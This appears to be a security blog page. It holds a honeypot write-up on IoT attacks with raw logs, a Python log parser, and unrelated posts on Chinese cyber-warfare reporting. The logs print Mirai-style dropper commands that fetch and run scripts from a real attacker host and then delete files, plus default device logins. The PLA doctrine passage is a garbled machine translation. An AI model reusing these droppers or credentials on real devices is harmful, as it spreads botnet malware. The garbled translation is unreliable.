Beyond the firewall – 4 hours of recorded attacks against IOT devices

The graph below shows a distribution, by country, of the attacks seen by a laptop exposed to the open Internet for 4 hours on July 23, 2017.  TCP 23 (telnet) and TCP 1433 (MSSQL) were exposed and attack payloads directed against those services were recorded by honeypots running on those ports. All attacks are listed below together with a discussion of two particular IOT (Internet of Things)  attacks.

The laptop exposure was inadvertent and possibly related to Universal Plug and Play (UPNP) being enabled on the home router.  The laptop happened to be running an HPSS honeypoint agent with fake listeners on several common service ports. The agents send alerts to a central console that records information about the attack in a database and optionally writes to a log.  Those log entries are provided at the end of this post.

Here’s the net message:

Attacks against unsecured IOT devices are a reality – and they are happening right at the Internet boundary of your own home or business.

Do you have an IP-enabled home video camera or similar device?  See if it is on this list of devices known to be attacked:

https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack/

Note that events similar to those described below can – and do – happen within the firewall. See our previous post on the use of honeypots to detect the spread of malware within the private internal space of an organization.

If you are not already using some form of honeypot as part of your IDS strategy, consider doing so. They are normally quiet watchdogs – but when they do bark, there really is something going on you need to know about.

==> Oh.. and UPNP?  If that’s enabled on your home router, TURN IT OFF!

Netgear: http://netgear-us.custhelp.com/app/answers/detail/a_id/22686/~/how-to-disable-the-upnp-feature-on-your-netgear-router

Linksys: https://www.linksys.com/us/support-article?articleNum=135071

ASUS:  https://www.ghacks.net/2015/03/24/secure-you-wireless-router/


Here are the details of the attacks seen during that 4-hour window:

The sources of attacks were diverse by country of origin. The attacking systems were almost certainly compromised systems being used by the attackers without the owners’ awareness, although state-sponsored activity cannot be ruled out.

  • Here is one item of interest:

Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 at 2017-08-06 19:43:02 Alert Data: sh#015#012cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.111 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.111; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.111 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *#015

  • The attacker IP (1.30.116.116) is registered in China/Mongolia.

inetnum: 1.24.0.0 – 1.31.255.255
netname: UNICOM-NM
descr: China unicom InnerMongolia province network

  • The attacker is attempting to cause the targeted victim machine to download and execute a shell script

wget http://185.165.29.111/heckz.sh; chmod 777 heckz.sh; sh heckz.sh;

  • 185.165.29.111 – the source of the script – is an IP associated with Germany.

inetnum: 185.165.29.0 – 185.165.29.255
netname: AlmasHosting
country: DE

  • The few IPs with reverse DNS in that /24 are associated with Iran (.ir domain).

host.mlsending.ir (185.165.29.58)
host.mlsender.ir (185.165.29.59)
host.madstoreml.ir (185.165.29.80)

  • Heckz.sh is associated with known malware

https://virustotal.com/en/file/5a5183c1f5fdab92e15f64f18c15a390717e313a9f049cd9de4fbb3f3adc4008/analysis/

  • The shell script – if successfully downloaded and executed – runs:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/mba; chmod +x mba; ./mba; rm -rf mba
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ebs; chmod +x ebs; ./ebs; rm -rf ebs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ew; chmod +x ew; ./ew; rm -rf ew
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/aw; chmod +x aw; ./aw; rm -rf aw
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ftr; chmod +x ftr; ./ftr; rm -rf ftr
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/er; chmod +x er; ./er; rm -rf er
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/re; chmod +x re; ./re; rm -rf re
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ty; chmod +x ty; ./ty; rm -rf ty
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/ke; chmod +x ke; ./ke; rm -rf ke
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/as; chmod +x as; ./as; rm -rf as
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/fg; chmod +x fg; ./fg; rm -rf fg
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/sddf; chmod +x sddf; ./sddf; rm -rf sddf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/tel; chmod +x tel; ./tel; rm -rf tel

  • The “ew” program is known malware…..

https://virustotal.com/en/file/9685eeef4b7b25871f162d0050c9a9addbcba1df464e25cf3dce66f5653ebeca/analysis/

  • …and likely is associated with a variant of this botnet’s infrastructure:

https://en.wikipedia.org/wiki/Mirai_(malware)

  • Here’s another entry of interest

Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 at 2017-08-06 21:12:57 Alert Data: root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015

  • On the central console this shows as:

  • This is an attempted attack against a specific Chinese vendor’s (XiongMai Technologies) firmware using a login/password that is embedded in that firmware

https://krebsonsecurity.com/2016/10/europe-to-push-new-security-rules-amid-iot-mess/


Summary:

An unfortunate event, for sure. Still, the presence of honeypots on the targeted machine allowed us to capture real-world attack data and learn something of the reality of life beyond the firewall.  The Mirai botnet malware – and its variants – go from being something read about to something actually seen.

Always useful for understanding threats and planning meaningful defense.


The data:

Here are the raw log entries of attacks seen over the 4-hour exposure interval. The ones discussed above and some others of interest are in bold.

Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 at 2017-08-06 19:42:47 Alert Data: Connection Received
Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 at 2017-08-06 19:43:02 Alert Data: sh#015#012cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.111/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.111 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.111; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.111 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *#015
Jul 23 19:43: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 at 2017-08-06 19:43:55 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:43: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 at 2017-08-06 19:43:56 Alert Data: Connection Received
Jul 23 19:45: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 at 2017-08-06 19:45:36 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:46: hpoint-2371 received an alert from: 38.133.25.167 on port 23 at 2017-08-06 19:46:42 Alert Data: Connection Received
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:28 Alert Data: Connection Received
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:38 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:39 Alert Data: Connection Received
Jul 23 19:49: hpoint-2371 received an alert from: 110.81.178.253 on port 1433 at 2017-08-06 19:49:50 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 19:57: hpoint-2371 received an alert from: 70.79.76.209 on port 23 at 2017-08-06 19:57:21 Alert Data: Connection Received
Jul 23 20:00: hpoint-2371 received an alert from: 222.96.190.71 on port 23 at 2017-08-06 20:00:04 Alert Data: Connection Received
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:34 Alert Data: Connection Received
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:34 Alert Data: Connection Received
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:53 Alert Data: root#015#01212345#015#012enable#015
Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 at 2017-08-06 20:03:56 Alert Data: root#015#01212345#015#012enable#015
Jul 23 20:08: hpoint-2371 received an alert from: 114.234.164.43 on port 23 at 2017-08-06 20:08:22 Alert Data: Connection Received
Jul 23 20:08: hpoint-2371 received an alert from: 114.234.164.43 on port 23 at 2017-08-06 20:08:44 Alert Data: root#015#012zlxx.#015#012enable#015
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:05 Alert Data: Connection Received
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:15 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:16 Alert Data: Connection Received
Jul 23 20:20: hpoint-2371 received an alert from: 210.51.166.39 on port 1433 at 2017-08-06 20:20:26 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 20:46: hpoint-2371 received an alert from: 103.253.183.107 on port 23 at 2017-08-06 20:46:31 Alert Data: Connection Received
Jul 23 20:48: hpoint-2371 received an alert from: 119.186.47.97 on port 23 at 2017-08-06 20:48:00 Alert Data: Connection Received
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:15 Alert Data: Connection Received
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:26 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:26 Alert Data: Connection Received
Jul 23 20:50: hpoint-2371 received an alert from: 218.64.120.62 on port 1433 at 2017-08-06 20:50:37 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 21:07: hpoint-2371 received an alert from: 113.53.91.152 on port 23 at 2017-08-06 21:07:14 Alert Data: Connection Received
Jul 23 21:12: hpoint-2371 received an alert from: 192.249.135.180 on port 23 at 2017-08-06 21:12:15 Alert Data: Connection Received
Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 at 2017-08-06 21:12:53 Alert Data: Connection Received
Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 at 2017-08-06 21:12:57 Alert Data: root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015
Jul 23 21:17: hpoint-2371 received an alert from: 177.7.234.203 on port 23 at 2017-08-06 21:17:51 Alert Data: Connection Received
Jul 23 21:18: hpoint-2371 received an alert from: 177.7.234.203 on port 23 at 2017-08-06 21:18:12 Alert Data: root#015#01212345#015#012enable#015
Jul 23 21:51: hpoint-2371 received an alert from: 85.56.128.151 on port 23 at 2017-08-06 21:51:06 Alert Data: Connection Received
Jul 23 21:54: hpoint-2371 received an alert from: 24.212.74.182 on port 23 at 2017-08-06 21:54:45 Alert Data: Connection Received
Jul 23 22:03: hpoint-2371 received an alert from: 200.101.92.79 on port 23 at 2017-08-06 22:03:35 Alert Data: Connection Received
Jul 23 22:03: hpoint-2371 received an alert from: 200.101.92.79 on port 23 at 2017-08-06 22:03:58 Alert Data: guest#015#01212345#015#012enable#015
Jul 23 22:11: hpoint-2371 received an alert from: 60.171.201.182 on port 1433 at 2017-08-06 22:11:48 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:11: hpoint-2371 received an alert from: 60.171.201.182 on port 1433 at 2017-08-06 22:11:48 Alert Data: Connection Received
Jul 23 22:11: hpoint-2371 received an alert from: 60.171.201.182 on port 1433 at 2017-08-06 22:11:59 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:20: hpoint-2371 received an alert from: 31.163.178.165 on port 23 at 2017-08-06 22:20:07 Alert Data: guest#015#012guest#015#012enable#015
Jul 23 22:27: hpoint-2371 received an alert from: 91.122.218.139 on port 23 at 2017-08-06 22:27:09 Alert Data: Connection Received
Jul 23 22:35: hpoint-2371 received an alert from: 114.101.1.80 on port 23 at 2017-08-06 22:35:53 Alert Data: Connection Received
Jul 23 22:36: hpoint-2371 received an alert from: 114.101.1.80 on port 23 at 2017-08-06 22:36:22 Alert Data: Connection Received
Jul 23 22:36: hpoint-2371 received an alert from: 114.101.1.80 on port 23 at 2017-08-06 22:36:39 Alert Data: root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:17 Alert Data: Connection Received
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:28 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:28 Alert Data: Connection Received
Jul 23 22:43: hpoint-2371 received an alert from: 41.231.53.51 on port 1433 at 2017-08-06 22:43:39 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 22:53: hpoint-2371 received an alert from: 187.160.67.74 on port 23 at 2017-08-06 22:53:36 Alert Data: Connection Received
Jul 23 22:54: hpoint-2371 received an alert from: 187.160.67.74 on port 23 at 2017-08-06 22:54:09 Alert Data: enable#015#012system#015#012shell#015#012sh#015#012cat /proc/mounts; /bin/busybox JBQVI#015
Jul 23 22:54: hpoint-2371 received an alert from: 36.239.158.149 on port 23 at 2017-08-06 22:54:19 Alert Data: Connection Received
Jul 23 22:54: hpoint-2371 received an alert from: 36.239.158.149 on port 23 at 2017-08-06 22:54:41 Alert Data: root#015#01212345#015#012enable#015
Jul 23 22:57: hpoint-2371 received an alert from: 70.89.64.58 on port 23 at 2017-08-06 22:57:35 Alert Data: Connection Received
Jul 23 22:57: hpoint-2371 received an alert from: 70.89.64.58 on port 23 at 2017-08-06 22:57:57 Alert Data: root#015#012xc3511#015#012enable#015
Jul 23 23:02: hpoint-2371 received an alert from: 97.107.83.42 on port 23 at 2017-08-06 23:02:28 Alert Data: Connection Received
Jul 23 23:02: hpoint-2371 received an alert from: 1.30.218.39 on port 1433 at 2017-08-06 23:02:30 Alert Data: Connection Received
Jul 23 23:02: hpoint-2371 received an alert from: 1.30.218.39 on port 1433 at 2017-08-06 23:02:40 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 23:02: hpoint-2371 received an alert from: 1.30.218.39 on port 1433 at 2017-08-06 23:02:44 Alert Data: Connection Received
Jul 23 23:19: hpoint-2371 received an alert from: 54.145.111.48 on port 443 at 2017-08-06 23:19:20 Alert Data: Connection Received
Jul 23 23:19: hpoint-2371 received an alert from: 54.145.111.48 on port 443 at 2017-08-06 23:19:23 Alert Data: Non-ASCII Data Detected in Received Data.
Jul 23 23:23: hpoint-2371 received an alert from: 109.96.99.66 on port 23 at 2017-08-06 23:23:37 Alert Data: Connection Received
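
An added example, not part of the original post: a Python triage of alert lines like the ones above. It decodes the `#015#012` sequences (three-digit octal escapes for CR and LF), then reports which login/password pairs were tried and which hosts the download commands point at. The function names and the `enable`/`system`/`shell`/`sh` word list are assumptions of this example; the sample lines are copied from the log above.

```python
import re
from collections import Counter

# Alert lines copied from the log in this post; long lines are split across
# adjacent string literals for readability only.
SAMPLE_LOG = [
    "Jul 23 19:42: hpoint-2371 received an alert from: 1.30.116.116 on port 23 "
    "at 2017-08-06 19:43:02 Alert Data: sh#015#012cd /tmp || cd /var/run || "
    "cd /mnt || cd /root || cd /; wget http://185.165.29.111/heckz.sh; "
    "chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.111 -c get troute1.sh; "
    "chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.111; "
    "chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous "
    "-P 21 185.165.29.111 troute.sh troute.sh; sh troute.sh; "
    "rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *#015",
    "Jul 23 20:03: hpoint-2371 received an alert from: 76.122.32.157 on port 23 "
    "at 2017-08-06 20:03:53 Alert Data: root#015#01212345#015#012enable#015",
    "Jul 23 21:12: hpoint-2371 received an alert from: 217.107.124.39 on port 23 "
    "at 2017-08-06 21:12:57 Alert Data: "
    "root#015#012xc3511#015#012enable#015#012system#015#012shell#015#012sh#015",
    "Jul 23 22:03: hpoint-2371 received an alert from: 200.101.92.79 on port 23 "
    "at 2017-08-06 22:03:58 Alert Data: guest#015#01212345#015#012enable#015",
    "Jul 23 22:54: hpoint-2371 received an alert from: 187.160.67.74 on port 23 "
    "at 2017-08-06 22:54:09 Alert Data: enable#015#012system#015#012shell#015#012"
    "sh#015#012cat /proc/mounts; /bin/busybox JBQVI#015",
    "Jul 23 19:43: hpoint-2371 received an alert from: 222.174.243.134 on port 1433 "
    "at 2017-08-06 19:43:55 Alert Data: Non-ASCII Data Detected in Received Data.",
    "Jul 23 19:46: hpoint-2371 received an alert from: 38.133.25.167 on port 23 "
    "at 2017-08-06 19:46:42 Alert Data: Connection Received",
]

ALERT_RE = re.compile(
    r"received an alert from: (?P<src>\d{1,3}(?:\.\d{1,3}){3}) "
    r"on port (?P<port>\d+) at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"Alert Data: (?P<data>.*)$"
)
# Exactly three octal digits: in "#01212345" the escape is "#012" (LF) and
# "12345" is the password, so a greedy "#\d+" would eat the payload.
OCTAL_ESC = re.compile(r"#([0-7]{3})")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
URL_HOST = re.compile(r"://([^/\s:;]+)")
FETCH_TOOLS = {"wget", "tftp", "ftpget"}           # tools seen in the log above
SHELL_WORDS = {"enable", "system", "shell", "sh"}  # assumed: not usernames


def decode_escapes(text):
    """Turn '#015#012' style escapes back into the characters the client sent."""
    return OCTAL_ESC.sub(lambda m: chr(int(m.group(1), 8)), text)


def fetch_targets(command_line):
    """Return (tool, host) pairs for download commands in a ';'-separated line."""
    found = []
    for cmd in command_line.split(";"):
        words = cmd.split()
        if not words or words[0] not in FETCH_TOOLS:
            continue
        url, ip = URL_HOST.search(cmd), IPV4.search(cmd)
        host = url.group(1) if url else ip.group(0) if ip else None
        if host:
            found.append((words[0], host))
    return found


def parse_alert(line):
    """Parse one alert line into a record, or None if it is not an alert."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    rec = {"src": m.group("src"), "port": int(m.group("port")),
           "ts": m.group("ts"), "kind": "connect", "creds": None, "fetches": []}
    data = m.group("data").strip()
    if data == "Connection Received":
        return rec
    if data.startswith("Non-ASCII Data"):
        rec["kind"] = "binary"
        return rec
    tokens = [t for t in re.split(r"[\r\n]+", decode_escapes(data)) if t]
    for token in tokens:
        rec["fetches"] += fetch_targets(token)
    # A telnet login sends username then password; payloads that start with a
    # shell-escape word carried no credentials in that alert.
    if len(tokens) >= 2 and tokens[0] not in SHELL_WORDS:
        rec["creds"] = (tokens[0], tokens[1])
    rec["kind"] = ("dropper" if rec["fetches"]
                   else "login" if rec["creds"] else "shell-probe")
    return rec


def summarize(lines):
    """Count alert kinds and credential pairs; collect (tool, host) fetches."""
    kinds, creds, hosts = Counter(), Counter(), set()
    for line in lines:
        rec = parse_alert(line)
        if rec is None:
            continue
        kinds[rec["kind"]] += 1
        if rec["creds"]:
            creds[rec["creds"]] += 1
        hosts.update(rec["fetches"])
    return kinds, creds, hosts


if __name__ == "__main__":
    kinds, creds, hosts = summarize(SAMPLE_LOG)
    print(dict(kinds))
    print(creds.most_common())
    print(sorted(hosts))
```

Run over the full log, the credential counter shows at a glance which default logins are being sprayed, and the host set is the list to block or watch for in outbound traffic.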

China’s Report on US Military Cyber Troop Strength

(紅龍) Red Dragon’s statement: If you think you are paying too much for cyber threat intelligence and your current provider DID NOT SHOW this Chinese article to you, then you have paid too much for the incorrect type of Chinese Cyber Threat Intelligence…

Contact the Red Dragon (紅龍) @ MicroSolved, save money, stay better informed – find a capable cyber intelligence authority for less, much less….

whagestad@microsolved.com

Thank you

紅龍

People’s Republic of China Report: US cyber warfare force exceeds 80,000 personnel, equivalent to seven 101st Airborne Divisions

August 15, 2013, 08:49. Source: Phoenix TV

Key point: According to Sing Tao Global Network, the United States accounts for 29% of the world’s hackers. The US military has about 3,000 to 5,000 information warfare experts and 50,000 to 70,000 cyber warfare soldiers; together with its existing electronic warfare personnel, the US military’s cyber warfare force should number 88,700 people. That is equivalent in scale to seven 101st Airborne Divisions, and in a future war it would carry the task of reducing the enemy’s combat power by 40%.

Phoenix TV, August 14, “Military Observation Room”. The following is the transcript:

Narration: The Snowden affair set off a round of hype in Chinese and foreign media. In fact, the United States was the first to establish the largest cyber warfare force, has developed the world’s most advanced cyber warfare equipment, and has pushed it into actual combat. Recently, Sing Tao Global Network reported that the United States accounts for 29% of the world’s hackers, that the US military has about 3,000 to 5,000 information warfare experts and 50,000 to 70,000 cyber warfare soldiers, and that, together with its existing electronic warfare personnel, the US military’s cyber warfare force should number 88,700 people. That is equivalent in scale to seven 101st Airborne Divisions, and in a future war it would carry the task of reducing the enemy’s combat power by 40%.

The US cyber army numbers four thousand, made up of the world’s top computer experts and hackers, including experts from the CIA, the NSA, the FBI and other departments. The average IQ of its members is above 140, hence the name “140 Unit”. It was built single-handedly over eight years by US four-star General Alexander. His independent command includes the Navy’s Tenth Fleet, the Air Force’s 24th Air Force and the Army’s Second Army, an academic center of excellence responsible for training in espionage techniques, and a special data collection center dedicated to eavesdropping on embassies around the world. The United States is forming forty cyber security teams: 13 are offensive teams that mainly develop cyber warfare weapons, and the other 27 mainly protect the Department of Defense’s computer systems and data. All 40 teams are to be in place by the autumn of 2015.

“Military Observation Room” is broadcast on the Phoenix TV Chinese Channel [Program page]

http://big5.ifeng.com/gate/big5/phtv.ifeng.com/program/jqgcs/

Host: Dong Jiayao [Host page]

First broadcast: (Wednesday) 21:50-22:30

Replay: (Thursday) 04:10-04:50, 15:15-15:55

Statement: Works (text, audio, video) marked as sourced from “Phoenix” (ifeng.com) may not be reproduced, linked, reposted or otherwise used by any media outlet or individual without authorization from ifeng.com. Where written authorization has been given, use must be marked “Source: Phoenix (ifeng.com)”. ifeng.com will pursue legal liability for violations of this statement.

http://big5.ifeng.com/gate/big5/phtv.ifeng.com/program/jqgcs/detail_2013_08/15/28642074_0.shtml

US Concocting People’s War to Hype China Cyber Fears – FreeBeacon is Wrong…People’s Republic of China Rebuttal….


http://world.huanqiu.com/exclusive/2013-08/4195091.html

U.S. media treats a magazine as an internal report and fabricates a Chinese plan for a cyber people’s war

RedDragon’s Insight…there have been very few if any ‘cyber’ madness stories pointing the finger at the People’s Republic of China (中華人民共和國) since the traitorous Snowden left for Hong Kong and ended up in Russia working for the Soviet version of Facebook…This latest amplification by Gertz’ ‘Washington Free Bacon sorry Beacon…is yet another attempt by the unknowing and ignorant to cause controversy where there isn’t any…maybe the Free Bacon needs press, I expect the China hyperbole is the ticket..

Nonetheless, below is a story from within the People’s Republic of China indicating that Free Bacon is both incorrect (I wonder if Mr. Gertz speaks or understands Chinese or he is simply manufacturing a new enemy for the DIB?) and full of mis and dis- information…

The suggestion is to read the news story below and decide for yourself…having met with China’s Elite Hackers I can tell you they put the trousers on one leg at a time just like we do….

                                                         Semper Fi –

                                                           Thank you  紅龍

At 07:19 on August 1, 2013. Source: Global Times. Selected by: Wei Zheng

  Original title: U.S. media treats a magazine as an internal report and fabricates a Chinese plan for a cyber people’s war

  [Global Times comprehensive report] “Chinese military theorists are applying Mao Zedong’s peasant-uprising tactics to a future war against the United States.” This startling conclusion, reached by the US “Washington Free Beacon” on July 30, is an attempt to set off another round of attacks over “Chinese cyber warfare”. However, a “Global Times” investigation found that the report mentioned in the article is no “internal defense report” at all; the US media grafted cyber warfare theory, which the United States has studied most deeply, onto China as its origin merely to sensationalize.

  The “Washington Free Beacon” reported on July 30 that an internal Chinese defense report indicates that China’s military is preparing for cyber war, including attacking satellites from space and using military and civilian personnel to launch a digital “people’s war”. The paper said the report, titled “Space Cyber Warfare Research”, was drafted by four engineers at a defense research center in Shanghai and discloses details of China’s cyber warfare and space warfare plans: “This report gives outsiders a rare glimpse into Beijing’s most secret military project: plans for a future cyber war against the United States.” The report holds that in the past strategic warfare was based on nuclear weapons, but that in the information age the war of strategic significance should be cyber war. “Because information warfare depends on space, cyberspace will become a hotspot in the struggle for network control.”

  “China’s cyber warfare capabilities, like its anti-satellite missile and jamming programs, are the PLA’s most deeply hidden secret. At the China-US Strategic and Economic Dialogue held earlier this month, the topic of cyber warfare was raised by US and Chinese military and defense officials.” Yet in drawing this conclusion, the “Washington Free Beacon” went on to state that it had obtained a copy of a translation of the report, dated December 2012 and published in the journal “Aerospace Electronic Warfare”. The journal is a publication of the China Aerospace Science and Industry Corporation’s Nanjing 8511 Research Institute.

  Did the “Washington Free Beacon” really get hold of an internal Chinese defense report? On July 31 a “Global Times” reporter interviewed “Aerospace Electronic Warfare” magazine by telephone. A person at the magazine familiar with the matter told the reporter that “Aerospace Electronic Warfare” is a publicly distributed bimonthly that anyone who wants to can obtain, that its articles contain nothing classified, and that it could not possibly be an “internal defense report”. As for the article titled “Space Cyber Warfare Research”, it was written by Huang Hanwen and three others at the Shanghai Institute of Satellite Engineering. It addresses the fact that Chinese readers have no unified concept or clear understanding of “space cyber warfare” and introduces US concepts and definitions of space cyber warfare to China; it is in no way Chinese military theorists studying a people’s war in cyberspace.

  The “Global Times” reporter easily downloaded the article from the Internet. To the reporter it reads more like a popular-science introduction, opening by citing several US definitions of cyber warfare. In describing the characteristics of cyber warfare it says: “Cyber warfare is not limited to military personnel; anyone with specialized knowledge and skills in information systems can carry out cyber warfare, so it can be said that cyber warfare is a kind of people’s war.”

  Qin An, director of the Cyberspace Strategy Research Center of the China Institute for Innovation and Development Strategy, told the “Global Times” on the 31st that people’s war and cyber warfare have nothing to do with each other; cyber warfare is “elite warfare”, so how could it become “people’s war”?

  [Global Times special correspondents in the United States and the United Kingdom: Chen Zhuangliu, Sun Wei; Global Times reporters: Tu Limei, Wang Xiaoxiong, Luo Shan’ai]

Chinese Information Warfare (IW) Doctrinal Development Circa 2005….

Good Day Chinese Cyber Conflict Fans…the following post about Chinese Information Warfare Doctrine as written by Lu Yong, Department of National Defense Strategy, 中國人民解放軍, 總參謀部..yes The People’s Liberation Army…circa 2005. This post was discovered by the Red Dragon a week ago and has already been removed from the web…sinister?

Here it is folks, a glimpse into Chinese Information Warfare Doctrinal Development in 2005…

“Information Warfare Challenges and Countermeasures For Executing the People’s War”

http://www.chinamil.com.cn/site1/zgmb/2005-08/18/content_148840.htm

 Lu Yong, Department of National Defense Strategy, 中國人民解放軍, 總參謀部

    People’s War is a traditional weapon to defeat the enemy army. Since the 90s of last century, with the world’s burgeoning revolution in military affairs, and high-tech weapons in the war widely used form of war started by the mechanized warfare to information warfare changes, “Information warfare is the major wars of the 21st century form “has become a consensus. In the semi-mechanized and mechanized warfare formed and developed the people’s war, and how to address information warfare challenges, how to continue in the information war play its unique advantages to ensure winning future possible war, is we are faced with a major theoretical issues and practical issues urgent. First, information warfare launched the people’s war is faced with severe challenges     (a) the purpose of information warfare, the limited size of the previous national war, the country is facing severe challenges the way to meet the enemy     since World War II, especially in the last century 80 years, the international situation has undergone major changes, “peace and development” instead of “war and revolution”, a theme of the times. Correspondingly, local war to replace the previous world wars and the full-scale war, become the world’s major warfare. We may face future information warfare, must be local wars, which makes the whole war, lasting way to defeat the enemy is facing severe challenges.    

 First, the purpose of information technology local wars, limited size, the possibility of universal war greatly reduced. Compared with the world wars and the full-scale war, information local war by political, economic, diplomatic and other factors more directly, the purpose of war is often limited to a certain political and economic goals, the scale of war is also controlled in a certain range. In this case, the state can not disrupt the overall national development strategic steps, the state transferred from peacetime “Everything for the front, everything for victory in the war,” the wartime regime, to mobilize all the people participate in the war.     Secondly, information warfare, the power of the warring parties is not primarily the number of competitions contest, but the quality of competition, the number of people’s war in the traditional pattern of strengths compensate for disadvantages quality hard work. In information warfare, weapons and equipment quality exists “Time difference” has been impossible to quantify the advantage to make the war directly to the performance of quality and efficiency, technology-intensive confrontation between elite standing army.

 Therefore, national mobilization, national war is neither necessary, nor can fundamentally change the balance of forces contrast.     Again, the limited capacity of information warfare battlefield, the war directly to the masses are severely constrained. Information warfare battlefield often limited to the parties directly within a certain depth, certain waters or airspace, such as the Anti-Japanese war the Japanese into my territory impossible to reproduce the situation, which makes the past that a large number of armed and unarmed masses to direct war Traditional methods are severely constrained, even though the war is also useless.     (Two) Information sudden outbreak of war increased, shortening the process of war, lasting defeat the enemy’s strategic facing severe challenges     in the past war, war lasted a relatively long time to carry out the people’s war, it is possible to mobilize the masses to participate in the war, give full play to the advantages of quantity, quality and quantity of weapons and equipment to make up for the disadvantages, to make up for military, material deficiencies, gradual change through sustained combat enemy forces, and ultimately win the war. This is the victory of people’s war past, the basic experience, but also from the other instructions, the traditional gathering of people’s war and the release force take a long time.    

